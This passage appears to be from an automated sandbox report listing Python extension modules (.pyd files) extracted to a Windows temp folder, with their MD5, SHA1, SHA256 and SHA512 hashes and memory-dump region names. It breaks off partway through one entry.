C:\Users\Admin\AppData\Local\Temp\_MEI31842\_queue.pyd

MD5 b5b5a5e8720d50ad91e06cdacec3d5a4
SHA1 5b1393a1e21a5c45b2dbc0b7f449c1f6ea7e5e6c
SHA256 ab437efbe3f1c8bfea5deda1613df0ec8161e94a0852e8df35cd9ecaacb8ea43
SHA512 e0e76f7b39e1b3a418cc1109723d10a9a646a890be51a6942fbdcd36380d8ac3e3fbc37d310a4879191726d66177d90234019bc8692f01f22f69c3b8666125f4

memory/3784-145-0x00007FFDBE990000-0x00007FFDBE9A9000-memory.dmp

memory/3784-144-0x00007FFDBDF10000-0x00007FFDBDF46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31842\pyexpat.pyd

MD5 aa9a8dedae06de9e8af4ca399dbd18a7
SHA1 01214e5e453271e4b2a5371662bf2d28e7ce77cc
SHA256 5b4b151e7d203e97ba0cd63a69b9553bf2726cef84950d0af7f5f0486f5a2a13
SHA512 2dbbe65bd6648b0ef687d1bb70a642a6259e228fc92fcd313659b0560c68826affc42eec1baa8acf9c94520533883ca066d77bd283b457dbcdc24eefc11279c7

memory/3784-141-0x00007FFDBE130000-0x00007FFDBE15D000-memory.dmp

memory/3784-140-0x00007FFDC3040000-0x00007FFDC3059000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31842\_ssl.pyd

MD5 f41f0e84a9b45f94db9269e72e8481f9
SHA1 1b66b5aaf6bea44c5124b929181ea7f95bcbdf73
SHA256 21ae364a3abce77b624eba0b0b6e5e7d07ebbfc2108a38b3ceb7e9c9086c42d0
SHA512 35260ef642d9c8ed1b4528ded61d475048538e2560137fc3fe1354e1da0c93982ff5a6f648ec5e8e0f62a421a65afc9b909c9e1f793200beb8ef79bb25c5537d

C:\Users\Admin\AppData\Local\Temp\_MEI31842\_sqlite3.pyd

MD5 6a4d3dad28e7ce82d48bd153742412e6
SHA1 073a28d5755d46493feaf18e90da221eee9d2044
SHA256 f2c2f5d79bd722a1cea010c7b90dafb06e7d637c7f7c3137983a24c6e0e59945
SHA512 63eb4e224f2bf5e81b2b7461ff0ef3a8c5fbba1198f97d3259519ca78f8203ce2cf474562142287f31625b28c56fd0ba08275d6c33887de4c63a34856d892e87

C:\Users\Admin\AppData\Local\Temp\_MEI31842\_overlapped.pyd

MD5 826fd819fc3832a58a5549a045b6dc7c
SHA1 969a0a644d628f8c46c83d12675a88cf5f6de8e1
SHA256 c2419f6992d398bc83abc4a7265d9ba65ca86d7a4d6d44af628b42d1e1d611ec
SHA512 297754f8fef255f9875d84b93c89e51c18c53c29acd9ed241aa221830cc9a36545a5fe75c253f794c8c164b0904e2f4a7257cf5285a16cbefe04fef4353e937e

C:\Users\Admin\AppData\Local\Temp\_MEI31842\_multiprocessing.pyd

MD5 dbb3deec4ea0780efb3d7edbf084e7dc
SHA1 da19a63e82c58f7d003df642548feff0bde66f51
SHA256 85a189d5018cb1f8a1f7f14056956c63dcde9d6cb38bcaea5d2ff8f14702e671
SHA512 105195944de39d3c883535f880bdaa24fa060c6686a1821b2d7359d97ecb0de15cf12fc7cc904692f7b8290c05bf346451fb02515af0549f330f8606c1a5da1a

C:\Users\Admin\AppData\Local\Temp\_MEI31842\_hashlib.pyd

MD5 a6b1c589b11891f3e0ef655fa552a916
SHA1 624187b7278d04186d795d94a7935c15d97661ae
SHA256 2bc94748820b9367190ea95b3ed9e13b01c4bb2b2e018913993f626f5d02a938